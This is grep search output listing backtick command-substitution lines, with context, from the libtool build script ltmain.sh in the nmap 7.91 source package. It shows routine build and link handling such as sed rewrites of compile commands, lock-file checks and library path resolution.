nmap-7.91+dfsg1/ltmain.sh-565-  :
nmap-7.91+dfsg1/ltmain.sh:566:elif test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t'; then
nmap-7.91+dfsg1/ltmain.sh-567-  # Yippee, $ECHO works!
##############################################
nmap-7.91+dfsg1/ltmain.sh-685-	# quotes we have to do it in 2 steps:
nmap-7.91+dfsg1/ltmain.sh:686:	extractedcf=`$SED -n -e "$sed_extractcf" < "$progpath"`
nmap-7.91+dfsg1/ltmain.sh-687-	eval "$extractedcf"
##############################################
nmap-7.91+dfsg1/ltmain.sh-1021-      # but not from the CC environment variable when configure was run.
nmap-7.91+dfsg1/ltmain.sh:1022:      " $CC "* | "$CC "* | " `$ECHO $CC` "* | "`$ECHO $CC` "* | " $CC_quoted"* | "$CC_quoted "* | " `$ECHO $CC_quoted` "* | "`$ECHO $CC_quoted` "*) ;;
nmap-7.91+dfsg1/ltmain.sh-1023-      # Blanks at the start of $base_compile will cause this to fail
##############################################
nmap-7.91+dfsg1/ltmain.sh-1028-	    # Evaluate the configuration.
nmap-7.91+dfsg1/ltmain.sh:1029:	    eval "`${SED} -n -e '/^# ### BEGIN LIBTOOL TAG CONFIG: '$z'$/,/^# ### END LIBTOOL TAG CONFIG: '$z'$/p' < $progpath`"
nmap-7.91+dfsg1/ltmain.sh-1030-	    CC_quoted=
##############################################
nmap-7.91+dfsg1/ltmain.sh-1036-	    case "$@ " in
nmap-7.91+dfsg1/ltmain.sh:1037:	      " $CC "* | "$CC "* | " `$ECHO $CC` "* | "`$ECHO $CC` "* | " $CC_quoted"* | "$CC_quoted "* | " `$ECHO $CC_quoted` "* | "`$ECHO $CC_quoted` "*)
nmap-7.91+dfsg1/ltmain.sh-1038-	      # The compiler in the base compile command matches
##############################################
nmap-7.91+dfsg1/ltmain.sh-1213-    *.[cCFSifmso] | \
nmap-7.91+dfsg1/ltmain.sh:1214:    *.ada | *.adb | *.ads | *.asm | \
nmap-7.91+dfsg1/ltmain.sh-1215-    *.c++ | *.cc | *.ii | *.class | *.cpp | *.cxx | \
##############################################
nmap-7.91+dfsg1/ltmain.sh-1290-    if test "$compiler_c_o" = no; then
nmap-7.91+dfsg1/ltmain.sh:1291:      output_obj=`$ECHO "X$srcfile" | $Xsed -e 's%^.*/%%' -e 's%\.[^.]*$%%'`.${objext}
nmap-7.91+dfsg1/ltmain.sh-1292-      lockfile="$output_obj.lock"
##############################################
nmap-7.91+dfsg1/ltmain.sh-1309-*** ERROR, $lockfile exists and contains:
nmap-7.91+dfsg1/ltmain.sh:1310:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-1311-
##############################################
nmap-7.91+dfsg1/ltmain.sh-1358-      if test "$need_locks" = warn &&
nmap-7.91+dfsg1/ltmain.sh:1359:	 test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then
nmap-7.91+dfsg1/ltmain.sh-1360-	$ECHO "\
nmap-7.91+dfsg1/ltmain.sh-1361-*** ERROR, $lockfile contains:
nmap-7.91+dfsg1/ltmain.sh:1362:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-1363-
##############################################
nmap-7.91+dfsg1/ltmain.sh-1407-      if test "$need_locks" = warn &&
nmap-7.91+dfsg1/ltmain.sh:1408:	 test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then
nmap-7.91+dfsg1/ltmain.sh-1409-	$ECHO "\
nmap-7.91+dfsg1/ltmain.sh-1410-*** ERROR, $lockfile contains:
nmap-7.91+dfsg1/ltmain.sh:1411:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-1412-
##############################################
nmap-7.91+dfsg1/ltmain.sh-1665-	  test -n "$library_names" && \
nmap-7.91+dfsg1/ltmain.sh:1666:	    func_warning "\`$file' was not linked with \`-export-dynamic'"
nmap-7.91+dfsg1/ltmain.sh-1667-	  continue
##############################################
nmap-7.91+dfsg1/ltmain.sh-1676-	  if test ! -f "$dir/$dlname"; then
nmap-7.91+dfsg1/ltmain.sh:1677:	    func_fatal_error "cannot find \`$dlname' in \`$dir' or \`$dir/$objdir'"
nmap-7.91+dfsg1/ltmain.sh-1678-	  fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-1694-      # Get the absolute pathname.
nmap-7.91+dfsg1/ltmain.sh:1695:      absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/ltmain.sh-1696-      test -n "$absdir" && dir="$absdir"
##############################################
nmap-7.91+dfsg1/ltmain.sh-2012-	  # Determine the prefix the user has applied to our future dir.
nmap-7.91+dfsg1/ltmain.sh:2013:	  inst_prefix_dir=`$ECHO "X$destdir" | $Xsed -e "s%$libdir\$%%"`
nmap-7.91+dfsg1/ltmain.sh-2014-
##############################################
nmap-7.91+dfsg1/ltmain.sh-2025-	    # Stick the inst_prefix_dir data into the link command.
nmap-7.91+dfsg1/ltmain.sh:2026:	    relink_command=`$ECHO "X$relink_command" | $Xsed -e "s%@inst_prefix_dir@%-inst-prefix-dir $inst_prefix_dir%"`
nmap-7.91+dfsg1/ltmain.sh-2027-	  else
nmap-7.91+dfsg1/ltmain.sh:2028:	    relink_command=`$ECHO "X$relink_command" | $Xsed -e "s%@inst_prefix_dir@%%"`
nmap-7.91+dfsg1/ltmain.sh-2029-	  fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-2185-	    fi
nmap-7.91+dfsg1/ltmain.sh:2186:	    libfile="$libdir/"`$ECHO "X$lib" | $Xsed -e 's%^.*/%%g'` ### testsuite: skip nested quoting test
nmap-7.91+dfsg1/ltmain.sh-2187-	    if test -n "$libdir" && test ! -f "$libfile"; then
nmap-7.91+dfsg1/ltmain.sh:2188:	      func_warning "\`$lib' has not been installed in \`$libdir'"
nmap-7.91+dfsg1/ltmain.sh-2189-	      finalize=no
##############################################
nmap-7.91+dfsg1/ltmain.sh-2204-	        # Replace the output file specification.
nmap-7.91+dfsg1/ltmain.sh:2205:	        relink_command=`$ECHO "X$relink_command" | $Xsed -e 's%@OUTPUT@%'"$outputname"'%g'`
nmap-7.91+dfsg1/ltmain.sh-2206-
##############################################
nmap-7.91+dfsg1/ltmain.sh-2223-	    # Install the binary that we compiled earlier.
nmap-7.91+dfsg1/ltmain.sh:2224:	    file=`$ECHO "X$file$stripped_ext" | $Xsed -e "s%\([^/]*\)$%$objdir/\1%"`
nmap-7.91+dfsg1/ltmain.sh-2225-	  fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-2294-    my_pic_p="${3-no}"
nmap-7.91+dfsg1/ltmain.sh:2295:    my_prefix=`$ECHO "$my_originator" | sed 's%[^a-zA-Z0-9]%_%g'`
nmap-7.91+dfsg1/ltmain.sh-2296-    my_dlsyms=
##############################################
nmap-7.91+dfsg1/ltmain.sh-2334-	  # Add our own program objects to the symbol list.
nmap-7.91+dfsg1/ltmain.sh:2335:	  progfiles=`$ECHO "X$objs$old_deplibs" | $SP2NL | $Xsed -e "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh-2336-	  for progfile in $progfiles; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-2517-	  if test -f "$output_objdir/$my_outputname.def"; then
nmap-7.91+dfsg1/ltmain.sh:2518:	    compile_command=`$ECHO "X$compile_command" | $Xsed -e "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh:2519:	    finalize_command=`$ECHO "X$finalize_command" | $Xsed -e "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh-2520-	  else
nmap-7.91+dfsg1/ltmain.sh:2521:	    compile_command=`$ECHO "X$compile_command" | $Xsed -e "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh:2522:	    finalize_command=`$ECHO "X$finalize_command" | $Xsed -e "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh-2523-	  fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-2525-	*)
nmap-7.91+dfsg1/ltmain.sh:2526:	  compile_command=`$ECHO "X$compile_command" | $Xsed -e "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh:2527:	  finalize_command=`$ECHO "X$finalize_command" | $Xsed -e "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/ltmain.sh-2528-	  ;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-2540-      # Nullify the symbol file.
nmap-7.91+dfsg1/ltmain.sh:2541:      compile_command=`$ECHO "X$compile_command" | $Xsed -e "s% @SYMFILE@%%"`
nmap-7.91+dfsg1/ltmain.sh:2542:      finalize_command=`$ECHO "X$finalize_command" | $Xsed -e "s% @SYMFILE@%%"`
nmap-7.91+dfsg1/ltmain.sh-2543-    fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-2555-  win32_libid_type="unknown"
nmap-7.91+dfsg1/ltmain.sh:2556:  win32_fileres=`file -L $1 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-2557-  case $win32_fileres in
##############################################
nmap-7.91+dfsg1/ltmain.sh-2652-	  darwin_curdir=`pwd`
nmap-7.91+dfsg1/ltmain.sh:2653:	  darwin_base_archive=`basename "$darwin_archive"`
nmap-7.91+dfsg1/ltmain.sh:2654:	  darwin_arches=`$LIPO -info "$darwin_archive" 2>/dev/null | $GREP Architectures 2>/dev/null || true`
nmap-7.91+dfsg1/ltmain.sh-2655-	  if test -n "$darwin_arches"; then
nmap-7.91+dfsg1/ltmain.sh:2656:	    darwin_arches=`$ECHO "$darwin_arches" | $SED -e 's/.*are://'`
nmap-7.91+dfsg1/ltmain.sh-2657-	    darwin_arch=
##############################################
nmap-7.91+dfsg1/ltmain.sh-2667-            ## Okay now we've a bunch of thin objects, gotta fatten them up :)
nmap-7.91+dfsg1/ltmain.sh:2668:	    darwin_filelist=`find unfat-$$ -type f -name \*.o -print -o -name \*.lo -print | $SED -e "$basename" | sort -u`
nmap-7.91+dfsg1/ltmain.sh-2669-	    darwin_file=
##############################################
nmap-7.91+dfsg1/ltmain.sh-2671-	    for darwin_file in $darwin_filelist; do
nmap-7.91+dfsg1/ltmain.sh:2672:	      darwin_files=`find unfat-$$ -name $darwin_file -print | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh-2673-	      $LIPO -create -output "$darwin_file" $darwin_files
##############################################
nmap-7.91+dfsg1/ltmain.sh-2686-      esac
nmap-7.91+dfsg1/ltmain.sh:2687:      my_oldobjs="$my_oldobjs "`find $my_xdir -name \*.$objext -print -o -name \*.lo -print | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh-2688-    done
##############################################
nmap-7.91+dfsg1/ltmain.sh-2757-      shift
nmap-7.91+dfsg1/ltmain.sh:2758:    elif test \"X\`{ \$ECHO '\t'; } 2>/dev/null\`\" = 'X\t'; then
nmap-7.91+dfsg1/ltmain.sh-2759-      # Yippee, \$ECHO works!
##############################################
nmap-7.91+dfsg1/ltmain.sh-2769-  # Find the directory that this script lives in.
nmap-7.91+dfsg1/ltmain.sh:2770:  thisdir=\`\$ECHO \"X\$file\" | \$Xsed -e 's%/[^/]*$%%'\`
nmap-7.91+dfsg1/ltmain.sh-2771-  test \"x\$thisdir\" = \"x\$file\" && thisdir=.
##############################################
nmap-7.91+dfsg1/ltmain.sh-2773-  # Follow symbolic links until we get to the real thisdir.
nmap-7.91+dfsg1/ltmain.sh:2774:  file=\`ls -ld \"\$file\" | ${SED} -n 's/.*-> //p'\`
nmap-7.91+dfsg1/ltmain.sh-2775-  while test -n \"\$file\"; do
nmap-7.91+dfsg1/ltmain.sh:2776:    destdir=\`\$ECHO \"X\$file\" | \$Xsed -e 's%/[^/]*\$%%'\`
nmap-7.91+dfsg1/ltmain.sh-2777-
##############################################
nmap-7.91+dfsg1/ltmain.sh-2785-
nmap-7.91+dfsg1/ltmain.sh:2786:    file=\`\$ECHO \"X\$file\" | \$Xsed -e 's%^.*/%%'\`
nmap-7.91+dfsg1/ltmain.sh:2787:    file=\`ls -ld \"\$thisdir/\$file\" | ${SED} -n 's/.*-> //p'\`
nmap-7.91+dfsg1/ltmain.sh-2788-  done
##############################################
nmap-7.91+dfsg1/ltmain.sh-2816-    case \"\$thisdir\" in
nmap-7.91+dfsg1/ltmain.sh:2817:    *[\\\\/]$objdir ) thisdir=\`\$ECHO \"X\$thisdir\" | \$Xsed -e 's%[\\\\/][^\\\\/]*$%%'\` ;;
nmap-7.91+dfsg1/ltmain.sh-2818-    $objdir )   thisdir=. ;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-2822-  # Try to get the absolute directory name.
nmap-7.91+dfsg1/ltmain.sh:2823:  absdir=\`cd \"\$thisdir\" && pwd\`
nmap-7.91+dfsg1/ltmain.sh-2824-  test -n \"\$absdir\" && thisdir=\"\$absdir\"
##############################################
nmap-7.91+dfsg1/ltmain.sh-2832-  if test ! -f \"\$progdir/\$program\" ||
nmap-7.91+dfsg1/ltmain.sh:2833:     { file=\`ls -1dt \"\$progdir/\$program\" \"\$progdir/../\$program\" 2>/dev/null | ${SED} 1q\`; \\
nmap-7.91+dfsg1/ltmain.sh-2834-       test \"X\$file\" != \"X\$progdir/\$program\"; }; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-2847-    if test -n \"\$relink_command\"; then
nmap-7.91+dfsg1/ltmain.sh:2848:      if relink_command_output=\`eval \$relink_command 2>&1\`; then :
nmap-7.91+dfsg1/ltmain.sh-2849-      else
##############################################
nmap-7.91+dfsg1/ltmain.sh-2879-    # The second colon is a workaround for a bug in BeOS R4 sed
nmap-7.91+dfsg1/ltmain.sh:2880:    $shlibpath_var=\`\$ECHO \"X\$$shlibpath_var\" | \$Xsed -e 's/::*\$//'\`
nmap-7.91+dfsg1/ltmain.sh-2881-
##############################################
nmap-7.91+dfsg1/ltmain.sh-2994-          *cygwin* )
nmap-7.91+dfsg1/ltmain.sh:2995:            func_to_host_path_tmp1=`cygpath -w "$1"`
nmap-7.91+dfsg1/ltmain.sh-2996-            func_to_host_path_result=`echo "$func_to_host_path_tmp1" |\
##############################################
nmap-7.91+dfsg1/ltmain.sh-3006-            # the odd construction:
nmap-7.91+dfsg1/ltmain.sh:3007:            func_to_host_path_tmp1=`winepath -w "$1" 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-3008-            if test "$?" -eq 0 && test -n "${func_to_host_path_tmp1}"; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-3073-          *cygwin* )
nmap-7.91+dfsg1/ltmain.sh:3074:            func_to_host_pathlist_tmp2=`cygpath -w -p "$func_to_host_pathlist_tmp1"`
nmap-7.91+dfsg1/ltmain.sh-3075-            func_to_host_pathlist_result=`echo "$func_to_host_pathlist_tmp2" |\
##############################################
nmap-7.91+dfsg1/ltmain.sh-4240-	    moreargs=
nmap-7.91+dfsg1/ltmain.sh:4241:	    for fil in `cat "$save_arg"`
nmap-7.91+dfsg1/ltmain.sh-4242-	    do
##############################################
nmap-7.91+dfsg1/ltmain.sh-4490-	*)
nmap-7.91+dfsg1/ltmain.sh:4491:	  absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/ltmain.sh-4492-	  test -z "$absdir" && \
##############################################
nmap-7.91+dfsg1/ltmain.sh-4505-	*-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*)
nmap-7.91+dfsg1/ltmain.sh:4506:	  testbindir=`$ECHO "X$dir" | $Xsed -e 's*/lib$*/bin*'`
nmap-7.91+dfsg1/ltmain.sh-4507-	  case :$dllsearchpath: in
##############################################
nmap-7.91+dfsg1/ltmain.sh-4927-      # get the directories listed in $shlibpath_var
nmap-7.91+dfsg1/ltmain.sh:4928:      eval shlib_search_path=\`\$ECHO \"X\${$shlibpath_var}\" \| \$Xsed -e \'s/:/ /g\'\`
nmap-7.91+dfsg1/ltmain.sh-4929-    else
##############################################
nmap-7.91+dfsg1/ltmain.sh-5050-	  for deplib in $dependency_libs; do
nmap-7.91+dfsg1/ltmain.sh:5051:            deplib_base=`$ECHO "X$deplib" | $Xsed -e "$basename"`
nmap-7.91+dfsg1/ltmain.sh-5052-	    case " $weak_libs " in
##############################################
nmap-7.91+dfsg1/ltmain.sh-5228-		  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/ltmain.sh:5229:		  match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/ltmain.sh-5230-		  if eval "\$ECHO \"X$deplib\"" 2>/dev/null | $Xsed -e 10q \
##############################################
nmap-7.91+dfsg1/ltmain.sh-5291-	else
nmap-7.91+dfsg1/ltmain.sh:5292:	  func_fatal_error "cannot find the library \`$lib' or unhandled argument \`$deplib'"
nmap-7.91+dfsg1/ltmain.sh-5293-	fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-5320-	if test -n "$inherited_linker_flags"; then
nmap-7.91+dfsg1/ltmain.sh:5321:	  tmp_inherited_linker_flags=`$ECHO "X$inherited_linker_flags" | $Xsed -e 's/-framework \([^ $]*\)/\1.ltframework/g'`
nmap-7.91+dfsg1/ltmain.sh-5322-	  for tmp_inherited_linker_flag in $tmp_inherited_linker_flags; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-5328-	fi
nmap-7.91+dfsg1/ltmain.sh:5329:	dependency_libs=`$ECHO "X $dependency_libs" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh-5330-	if test "$linkmode,$pass" = "lib,link" ||
##############################################
nmap-7.91+dfsg1/ltmain.sh-5395-	*)
nmap-7.91+dfsg1/ltmain.sh:5396:	  abs_ladir=`cd "$ladir" && pwd`
nmap-7.91+dfsg1/ltmain.sh-5397-	  if test -z "$abs_ladir"; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-5621-	    shift
nmap-7.91+dfsg1/ltmain.sh:5622:	    libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/ltmain.sh-5623-	    # use dlname if we got it. it's perfectly good, no?
##############################################
nmap-7.91+dfsg1/ltmain.sh-5904-		*)
nmap-7.91+dfsg1/ltmain.sh:5905:		  absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/ltmain.sh-5906-		  if test -z "$absdir"; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-5915-		  depdepl=
nmap-7.91+dfsg1/ltmain.sh:5916:		  eval deplibrary_names=`${SED} -n -e 's/^library_names=\(.*\)$/\1/p' $deplib`
nmap-7.91+dfsg1/ltmain.sh-5917-		  if test -n "$deplibrary_names" ; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-5922-		      depdepl="$absdir/$objdir/$depdepl"
nmap-7.91+dfsg1/ltmain.sh:5923:		      darwin_install_name=`${OTOOL} -L $depdepl | awk '{if (NR == 2) {print $1;exit}}'`
nmap-7.91+dfsg1/ltmain.sh-5924-                      if test -z "$darwin_install_name"; then
nmap-7.91+dfsg1/ltmain.sh:5925:                          darwin_install_name=`${OTOOL64} -L $depdepl  | awk '{if (NR == 2) {print $1;exit}}'`
nmap-7.91+dfsg1/ltmain.sh-5926-                      fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-5937-		else
nmap-7.91+dfsg1/ltmain.sh:5938:		  eval libdir=`${SED} -n -e 's/^libdir=\(.*\)$/\1/p' $deplib`
nmap-7.91+dfsg1/ltmain.sh-5939-		  test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/ltmain.sh-5960-	else
nmap-7.91+dfsg1/ltmain.sh:5961:	  compiler_flags="$compiler_flags "`$ECHO "X $new_inherited_linker_flags" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh-5962-	fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-6109-	test "$module" = no && \
nmap-7.91+dfsg1/ltmain.sh:6110:	  func_fatal_help "libtool library \`$output' must begin with \`lib'"
nmap-7.91+dfsg1/ltmain.sh-6111-
##############################################
nmap-7.91+dfsg1/ltmain.sh-6243-	if test "$age" -gt "$current"; then
nmap-7.91+dfsg1/ltmain.sh:6244:	  func_error "AGE \`$age' is greater than the current interface number \`$current'"
nmap-7.91+dfsg1/ltmain.sh-6245-	  func_fatal_error "\`$vinfo' is not valid version information"
##############################################
nmap-7.91+dfsg1/ltmain.sh-6404-	removelist=
nmap-7.91+dfsg1/ltmain.sh:6405:	tempremovelist=`$ECHO "$output_objdir/*"`
nmap-7.91+dfsg1/ltmain.sh-6406-	for p in $tempremovelist; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-6430-	# Transform .lo files to .o files.
nmap-7.91+dfsg1/ltmain.sh:6431:	oldobjs="$objs "`$ECHO "X$libobjs" | $SP2NL | $Xsed -e '/\.'${libext}'$/d' -e "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh-6432-      fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-6435-      #for path in $notinst_path; do
nmap-7.91+dfsg1/ltmain.sh:6436:      #	lib_search_path=`$ECHO "X$lib_search_path " | $Xsed -e "s% $path % %g"`
nmap-7.91+dfsg1/ltmain.sh:6437:      #	deplibs=`$ECHO "X$deplibs " | $Xsed -e "s% -L$path % %g"`
nmap-7.91+dfsg1/ltmain.sh:6438:      #	dependency_libs=`$ECHO "X$dependency_libs " | $Xsed -e "s% -L$path % %g"`
nmap-7.91+dfsg1/ltmain.sh-6439-      #done
##############################################
nmap-7.91+dfsg1/ltmain.sh-6555-		if test -n "$i" ; then
nmap-7.91+dfsg1/ltmain.sh:6556:		  libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/ltmain.sh:6557:		  deplib_matches=`eval "\\$ECHO \"$library_names_spec\""`
nmap-7.91+dfsg1/ltmain.sh-6558-		  set dummy $deplib_matches; shift
nmap-7.91+dfsg1/ltmain.sh-6559-		  deplib_match=$1
nmap-7.91+dfsg1/ltmain.sh:6560:		  if test `expr "$ldd_output" : ".*$deplib_match"` -ne 0 ; then
nmap-7.91+dfsg1/ltmain.sh-6561-		    newdeplibs="$newdeplibs $i"
##############################################
nmap-7.91+dfsg1/ltmain.sh-6598-		  if test -n "$i" ; then
nmap-7.91+dfsg1/ltmain.sh:6599:		    libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/ltmain.sh:6600:		    deplib_matches=`eval "\\$ECHO \"$library_names_spec\""`
nmap-7.91+dfsg1/ltmain.sh-6601-		    set dummy $deplib_matches; shift
nmap-7.91+dfsg1/ltmain.sh-6602-		    deplib_match=$1
nmap-7.91+dfsg1/ltmain.sh:6603:		    if test `expr "$ldd_output" : ".*$deplib_match"` -ne 0 ; then
nmap-7.91+dfsg1/ltmain.sh-6604-		      newdeplibs="$newdeplibs $i"
##############################################
nmap-7.91+dfsg1/ltmain.sh-6633-	  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/ltmain.sh:6634:	  file_magic_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/ltmain.sh-6635-	  for a_deplib in $deplibs; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-6648-	      if test -n "$a_deplib" ; then
nmap-7.91+dfsg1/ltmain.sh:6649:		libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/ltmain.sh-6650-		for i in $lib_search_path $sys_lib_search_path $shlib_search_path; do
nmap-7.91+dfsg1/ltmain.sh:6651:		  potential_libs=`ls $i/$libname[.-]* 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-6652-		  for potent_lib in $potential_libs; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-6664-		      while test -h "$potlib" 2>/dev/null; do
nmap-7.91+dfsg1/ltmain.sh:6665:			potliblink=`ls -ld $potlib | ${SED} 's/.* -> //'`
nmap-7.91+dfsg1/ltmain.sh-6666-			case $potliblink in
nmap-7.91+dfsg1/ltmain.sh-6667-			[\\/]* | [A-Za-z]:[\\/]*) potlib="$potliblink";;
nmap-7.91+dfsg1/ltmain.sh:6668:			*) potlib=`$ECHO "X$potlib" | $Xsed -e 's,[^/]*$,,'`"$potliblink";;
nmap-7.91+dfsg1/ltmain.sh-6669-			esac
##############################################
nmap-7.91+dfsg1/ltmain.sh-6705-	  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/ltmain.sh:6706:	  match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/ltmain.sh-6707-	  for a_deplib in $deplibs; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-6720-	      if test -n "$a_deplib" ; then
nmap-7.91+dfsg1/ltmain.sh:6721:		libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/ltmain.sh-6722-		for i in $lib_search_path $sys_lib_search_path $shlib_search_path; do
nmap-7.91+dfsg1/ltmain.sh:6723:		  potential_libs=`ls $i/$libname[.-]* 2>/dev/null`
nmap-7.91+dfsg1/ltmain.sh-6724-		  for potent_lib in $potential_libs; do
##############################################
nmap-7.91+dfsg1/ltmain.sh-6764-	      # can't use Xsed below, because $i might contain '/'
nmap-7.91+dfsg1/ltmain.sh:6765:	      tmp_deplibs=`$ECHO "X $tmp_deplibs" | $Xsed -e "s,$i,,"`
nmap-7.91+dfsg1/ltmain.sh-6766-	    done
##############################################
nmap-7.91+dfsg1/ltmain.sh-6789-	  # On Rhapsody replace the C library with the System framework
nmap-7.91+dfsg1/ltmain.sh:6790:	  newdeplibs=`$ECHO "X $newdeplibs" | $Xsed -e 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/ltmain.sh-6791-	  ;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-6841-	*-*-darwin*)
nmap-7.91+dfsg1/ltmain.sh:6842:	  newdeplibs=`$ECHO "X $newdeplibs" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh:6843:	  new_inherited_linker_flags=`$ECHO "X $new_inherited_linker_flags" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh:6844:	  deplibs=`$ECHO "X $deplibs" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh-6845-	  ;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-6965-	# Use standard objects if they are pic
nmap-7.91+dfsg1/ltmain.sh:6966:	test -z "$pic_flag" && libobjs=`$ECHO "X$libobjs" | $SP2NL | $Xsed -e "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh-6967-	test "X$libobjs" = "X " && libobjs=
##############################################
nmap-7.91+dfsg1/ltmain.sh-6980-	    # exporting using user supplied symfile
nmap-7.91+dfsg1/ltmain.sh:6981:	    if test "x`$SED 1q $export_symbols`" != xEXPORTS; then
nmap-7.91+dfsg1/ltmain.sh-6982-	      # and it's NOT already a .def file. Must figure out
##############################################
nmap-7.91+dfsg1/ltmain.sh-7132-	  save_output=$output
nmap-7.91+dfsg1/ltmain.sh:7133:	  output_la=`$ECHO "X$output" | $Xsed -e "$basename"`
nmap-7.91+dfsg1/ltmain.sh-7134-
##############################################
nmap-7.91+dfsg1/ltmain.sh-7436-	  eval tmp_whole_archive_flags=\"$whole_archive_flag_spec\"
nmap-7.91+dfsg1/ltmain.sh:7437:	  reload_conv_objs=$reload_objs\ `$ECHO "X$tmp_whole_archive_flags" | $Xsed -e 's|,| |g'`
nmap-7.91+dfsg1/ltmain.sh-7438-	else
##############################################
nmap-7.91+dfsg1/ltmain.sh-7447-      # Create the old-style object.
nmap-7.91+dfsg1/ltmain.sh:7448:      reload_objs="$objs$old_deplibs "`$ECHO "X$libobjs" | $SP2NL | $Xsed -e '/\.'${libext}$'/d' -e '/\.lib$/d' -e "$lo2o" | $NL2SP`" $reload_conv_objs" ### testsuite: skip nested quoting test
nmap-7.91+dfsg1/ltmain.sh-7449-
##############################################
nmap-7.91+dfsg1/ltmain.sh-7507-	# On Rhapsody replace the C library is the System framework
nmap-7.91+dfsg1/ltmain.sh:7508:	compile_deplibs=`$ECHO "X $compile_deplibs" | $Xsed -e 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/ltmain.sh:7509:	finalize_deplibs=`$ECHO "X $finalize_deplibs" | $Xsed -e 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/ltmain.sh-7510-	;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-7525-	# Time to change all our "foo.ltframework" stuff back to "-framework foo"
nmap-7.91+dfsg1/ltmain.sh:7526:	compile_deplibs=`$ECHO "X $compile_deplibs" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh:7527:	finalize_deplibs=`$ECHO "X $finalize_deplibs" | $Xsed -e 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/ltmain.sh-7528-	;;
##############################################
nmap-7.91+dfsg1/ltmain.sh-7603-	*-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*)
nmap-7.91+dfsg1/ltmain.sh:7604:	  testbindir=`${ECHO} "$libdir" | ${SED} -e 's*/lib$*/bin*'`
nmap-7.91+dfsg1/ltmain.sh-7605-	  case :$dllsearchpath: in
##############################################
nmap-7.91+dfsg1/ltmain.sh-7663-	# Transform all the library objects into standard objects.
nmap-7.91+dfsg1/ltmain.sh:7664:	compile_command=`$ECHO "X$compile_command" | $SP2NL | $Xsed -e "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/ltmain.sh:7665:	finalize_command=`$ECHO "X$finalize_command" | $SP2NL | $Xsed -e "$lo2o" | $NL2SP`
